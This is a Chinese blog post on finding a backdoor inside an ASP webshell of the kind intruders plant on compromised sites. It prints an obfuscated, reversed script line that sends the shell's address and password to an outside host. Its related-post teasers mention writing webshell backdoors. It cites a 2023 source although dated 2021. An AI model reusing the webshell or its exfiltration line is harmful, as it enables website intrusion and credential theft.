ASP木馬後門檢測

2021-12-29 21:04:20 字數 644 閱讀 8569

圖/文 張馨餘

作為乙個入侵愛好者,你是否想到過自己辛苦入侵後留下的asp木馬會是有後門的呢?今天我們就來看看如何查詢asp木馬的後門,方法超級簡單。

首先用解密工具將加密的asp木馬解密,再用文字方式開啟解密後的asp木馬,仔細查詢,發現一處「&prevres&╁=p&╁&urevres&╁=u&2=da?/da/moc.ecc8//:ptth=crs tpircs

圖1先不管它,我把asp木馬登入密碼設定成344566921,上傳到**上,登入asp木馬之後,開啟cookies臨時資料夾,能看到剛才訪問的asp檔案邊上多出了幾個檔案,如圖2所示。開啟第二檔案後,你會發現這是乙個後門,如圖3所示,asp位址和密碼都被記錄了。就這樣,自己辛苦的勞動被人不勞而獲了。

圖2圖3我們登入asp木馬後,檢視原始檔也能找到上面被記錄的asp木馬的位址和密碼,如圖4所示。

圖4大家可以用這種方法試試自己使用的asp木馬是否有後門。我在自己的**上使用了這個asp木馬做測試之後,我的站就被掛馬了。在看了黑防2023年第10期《隱藏的藝術》一文後,才有了今天這篇文章,由此讓我有了乙個思路,那就是不知道自己的asp木馬是否有後門時,就在自己的asp木馬上增加一段統計**,自己訪問的位址是可以知道的,如果是其他的ip訪問了這個asp木馬,那就要小心了,恐怕要有後門。這是本人的笨方法,但個人認為有一定的效果

揭密如何寫ASP木馬後門

正常的 end function if session web2a2dmin userpass then if request.form pass then if request.form pass userpass then session web2a2dmin userpass response...

Linux系統木馬後門查殺方法詳解

木馬和後門的查殺是系統管理員一項長期需要堅持的工作,切不可掉以輕心。以下從幾個方面在說明linux系統環境安排配置防範和木馬後門查殺的方法 一 web server 以nginx為例 1 為防止跨站感染,將虛擬主機目錄隔離 可以直接利用fpm建立多個程式池達到隔離效果 2 上傳目錄 include類...

PHP大馬後門學習

使使用者登入時候傳送鏈結到後台伺服器即可。簡單邏輯 實現如下 if empty get else 錯誤說明 請求的頁面不存在 原因1 訪問的文件許可權不夠 解決辦法 修改檔案許可權為755,windos系統修改目錄許可權為可寫可讀。原因2 防火牆的原因 解決辦法 先關閉讓防火牆通過www服務。原因3...